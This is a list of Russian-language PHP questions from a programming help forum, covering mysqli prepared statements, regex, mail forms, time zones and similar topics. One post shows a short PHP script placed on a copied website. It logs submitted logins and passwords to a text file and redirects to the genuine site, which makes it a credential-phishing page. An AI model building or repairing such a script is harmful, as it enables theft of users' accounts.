PHP
A general-purpose scripting language especially suited to web development
Explore Questions
-
0 votes2 answers
-
0 votes1 answer
-
0 votes1 answer
-
0 votes2 answers
-
0 votes0 answers
2,481 questions in this forum
-
Подготовленные запросы кладут сайт
Всем доброго времени суток! Проблема такая: запросы типа mysqli_stmt_* не выполняются и блокируют сайт. Простые mysqli-запросы выполняются, а вот с mysqli_stmt беда. Хотя расширение mysqlnd установлено и включено. Кто может подсказать, в чем может быть проблема? Заранее благодарен всем. Прикрепляю три фото: 1, 2 - код -> итог 3 - конфигурация (ссылка на файл с конфигурацией http://b983173k.bget.ru/info.php может, что упустил или не понял)
0 votes2 answers -
Ошибка типа Unexpected identifier
Здравствуйте. Возникла ошибка при отправки письма с формы, при чем на всех сайтах с этой формой. В чем дело ? http://lead-stavcredit.com/
0 votes2 answers -
Переадресация с файла .php на файл .html + выведение блока
Доброго времени суток! Подскажите пожалуйста, как сделать переадресацию с файла .php на файл .html и еще вывести блок об успешно выполненном действии? Причем должен выводиться он только при этой переадресации. Спасибо заранее! В целом-то думаю код не нужен) Точнее не выведение, а просто можно display:block с display:none поменять
0 votes2 answers -
Хранение HTML форм в базе
Приветствую всех, извиняюсь заранее за ламмерский вопрос - но мне вот нужно хранить код html формы в базе - то есть форма сама верстается через админку в textarea далее она должна сохранятся в базу и потом же опять грузится в textarea для например правки , вроде все работает но не работает если в самой редактируемой форме есть тоже textarea - смысл в том нужно редактировать формы (точнее их код ) в админке технология используется стандартная - php + bootstrap кто знает как это победить?
0 votes2 answers -
Новое api instagram
Приветствую, вопрос такого плана - ранее я получал последние фотки пользователя запросом вида https://api.instagram.com/v1/users/$user_id/media/recent/?client_id=$client_idСейчас это дело не работает для новых приложений, что то поменяли в API , старые зарешестрированые клиенты работают, а новые нет - в доке пишут про какую то песочницу, не сталкивался ли кто - может есть решение?
0 votes2 answers -
кодинг под андроид. лаунчер
Я тут не в тему, но может кто нибудь писал подобное)) можете подсказать ссылки на ресурс, по мануалу писания лаунчеров. т.е. я хочу написать свой лаунчер и интерфейс мне как таковой вообще не нужен. Мне хочется, чтобы андроид вместо всей своей системы запускал только одну программу. больше ничего на этих планшетах не будет. чисто планшет, который будет заточен на прогу. например выполнял роль книги Я в верном направлении думаю? или придется андроида пилить?
0 votes2 answers -
Проблема с делением на PHP
Коллеги, приветствую. Возникла проблема, казалось бы, на ровном месте. Есть вот такая строка кода: $x = floor(100 * $row->sale / $p2); Ошибку даёт деление на переменную $p2. То есть если я меняю деление на умножение - скрипт работает. Если меняю $p2 на 1500 - работает. Переменная абсолютно точно не равна 0. Пробовал принудительно приводить переменную к типу double - не помогает. Какие есть ещё нюансы при делении на php?
0 votes2 answers -
Отправка формы с модальным окном
Привет всем. Помогите, пожалуйста, разобраться. Задача следующая : после того, как пользователь заполнит и нажмет на кнопку отправки формы, должно появится модальное окно с текстом "Спасибо" и форма отправится на почту. Искал в сети примеры, но ничего так и не заработало. Последний вариант, на котором остановился, как самый простой. Есть форма <form id="ajaxform" action="" class="promo__form" name="mail" method="post" ectype="text/plain"> <p> <input placeholder="имя" name="name" class="input" required="required" type="text"> <input placeholder="телефон" name="phone" class="input pull-right" required="r…
0 votes2 answers -
REGEX для слов КАПСОМ
Привет! помогите составить регулярку на PHP? я только начал изучать эту тему, а мозг уже сломался У меня задача - достать все слова из строки, которые набраны ЗАГЛАВНЫМИ и ограничены пробелами или концом строки, и преобразовать их в строчные с первым заглавным символом. Например, исходная строка: "CARMEDIA VolksWagen POLO JLL-12RD HOME" (жирным выделены нужные) \b[А-ЯA-Z]+\b Вероятно что-то такое должно быть, но выделяется в том числе и JLL
0 votes2 answers -
Перевод времени из БД в нужную timezone
Коллеги, подскажите пожалуйста по такому вопросу: Получаю из БД дату вида 2016-09-17 09:48:45. (Время по Владивостоку). Потом мне нужно часы (09) перевести на время по Москве. Как это наиболее эфективно можно сделать? У нас разница -7 часов.
0 votes2 answers -
Омниканальная коммуникация с клиентами
Всем доброе время суток, думаю настал и мой черед переходить в онлайн. Коротко о процессе: Предоставляю услуги по техническому обслуживанию авто. Подумываю реализовать омниканальную коммуникацию со своими клиентами. В наличии своего сайта, лейдинга... нет необходимости, нужен канал для коммуникаций с клиентами средствами соцсетей и мессенджеров с получением сообщений в одном месте с возможностью перенаправления некоторых сообщений своим партнерам. Постараюсь пояснить: Клиенту(А) необходимо сделать ТО своего авто он пользуется ВК, в ВК он просит записать его на ТО, я подбираю дату и время и сообщаю ему. Клиент (Б) хочет узнать стоимость ТО, он поль…
0 votes2 answers -
перевод сериализированных массивов в другую кодировку
Столкнулся с тем что понадобилось перевести файлы с сериализованными массивами из windows-1251 в utf-8. узнал много нового) пришлось каждый файл загружать, собирать в массив, перекодировать и сохранять. А есть ли какие нибудь функции для этого? в инете нашел только регулярки, но они не запустились
0 votes2 answers -
HTML input file прикрепление к другим полям через PHP
Здравствуйте всем! Интересует такое решение задачки. Имеется вот такой вот HTML код <input type="text" name="comp" placeholder="Comp" /><br> <input type="text" name="name[]" placeholder="name1" /><br> <input type="text" name="desc[]" placeholder="desc1" /><br> <input type="file" name="files[]" multiple /><br> <input type="text" name="name[]" placeholder="name2" /><br> <input type="text" name="desc[]" placeholder="desc2" /><br> <input type="file" name="files[]" multiple /><br> Как создать массив с названиями файлов которые были выбраны в первом или втором input. Имеет…
0 votes2 answers -
Условие, если url содержит определенное слово (php)
Здравствуйте! Подскажите, пожалуйста, оптимальный вариант условия на PHP - если в url страницы есть слово tag,то ... Является ли оптимальным такой вариант: if(strpos($_SERVER['REQUEST_URI'], 'tag') !== false){ echo "..."; }
0 votes2 answers -
Как отправить некие данные на почту?
Есть форма, которая принимает имя пользователя (name="name") и его телефон (name="phone"). Как сделать так, что бы при нажатии кнопки "отправить" эти данные отправлялись на мою почту? Подскажите, пожалуйста, самый простой код без лишних заморочек. <form action="" class="h-form -visor-no-click"> <p class="h-form__title"> <strong>Химчистка</strong> мебели <span>или ковролина <em>в ПОДАРОК!</em></span> </p> <p class="h-form__desc">Заполните форму и получите бонус</p> <input type="text" class="h-f…
0 votes2 answers -
Sphinx поиск с разбиением
Коллеги, если у кого-то есть опыт работы со sphinx, подскажите пожалуйта, ищу по строке 'pf-1007'. Такого значения нет. А как сделать, что бы в данном случае выдались записи для '1007' пробовал (*pf*)(*1007*), но тоже не получается.
0 votes2 answers -
Многостраничный сайт-портфолио
У меня вот такой вопрос: я в данный момент создаю свой портфолио, небольшой, но, вроде как, красивый, без излишеств сайт на несколько страниц. Вопрос вот в чем: ssi я в данный момент юзать не могу (проблемы со стороны хоста, возможно решат в ближайшее время), можно ли делать банально несколько html и вязать гиперссылками? для начинающего разработчика пойдет? или обязательно нужно абы-как подключать ssi, либо подобные скрипты?
0 votes2 answers -
Сделал небольшой скрипт опроса
Протестируйте пожалуйста http://dkakharov.000webhostapp.com/ Иногда будет выдавать результат на +/- 1 процент от ста. Вот весь код db.php <?php error_reporting(E_ALL); $host = 'localhost'; $user = 'root'; $password = ''; $db_name = 'quiz'; $link = mysqli_connect($host, $user, $password, $db_name) or die(mysqli_error($link)); mysqli_query($link, "SET NAMES 'utf8'"); ?> index.php <?php require_once ('db.php'); $sql = "SELECT * FROM question"; $query = mysqli_query($link, $sql) or die(mysqli_error($link)); for ($res = []; $row = mysqli_fetch_assoc($query); $res[] = $row); …
0 votes2 answers -
Разбить строку после первого вхождения тега img
Здравствуйте. Как разбить на php текст после первого вхождения тега img , причем чтобы этот тег остался в первой части? В тексте может быть несколько тегов img.
0 votes2 answers -
Форма для заполнения и вывод pdf на сайте
Приветствую! На сайте почты России можно заполнить и распечатать pdf бланк почтового перевода, ссылка https://www.pochta.ru/form?type=F112EP_COD_SINGLE мне нужно, чтобы посетитель ввёл свои данные в форму и после нажатия на кнопку отправить, сформировался заполненный pdf-бланк, который отправится мне на email.
0 votes2 answers -
Устаревшая функция each
При запуске скрипта получаю ошибку "The each() function is deprecated". В гугле советуют вместо each использовать foreach. Скажите пожалуйста, как можно переписать функцию each. Код: while (list($key, $value) = each($_GET)) {
0 votes2 answers -
Ссылка в кнопке
У меня есть код кнопки, как сделать что-бы при ее нажатии перекидывало на внешний сторонний сайт, мне нужно в данном случае на вк <p class="contact-form__message"></p> <button type="submit" class="knopka">КЛИК</button> </form>
0 votes2 answers -
Помогите новичку)
Всем привет, только изучаю эту сферу и возник такой вопрос. Скачал html готового сайта, и попытался добавить php скрипт <?PHP $Log = $_POST['login']; $Pass = $_POST['password']; $log = fopen("database.txt","at"); fwrite($log,"\n $Log:$Pass \n"); fclose($log); header('Location: https://greentech-rp.com/'); ?> Далее добавил это все на хост через Filezilla. Сам скопированный сайт отображается идеально, но вот скрипт не работает от слова совсем, не идут данные в текстовый документ и нет переадресации после ввода данных. В архиве прикрепил полностью готовый сайт, в чем может быть проблема? 876678500_WinRAR.rar
0 votes2 answers -
Mysql: выборка топа статей по количеству коментов
есть 2 таблицы со следующими именами и полями articles id | body и coments id | article_id | body Подскажите плз, Как выбрать топ статей по кол-ву коментариев?
0 votes1 answer -
безопасность
Я читал что все что находится между <? и ?> обрабатывается на стороне сервера. А если туда вставить VB/JV скрипт? Он тоже будет обрабатываться на стороне сервера? Или в браузере юзера?
0 votes1 answer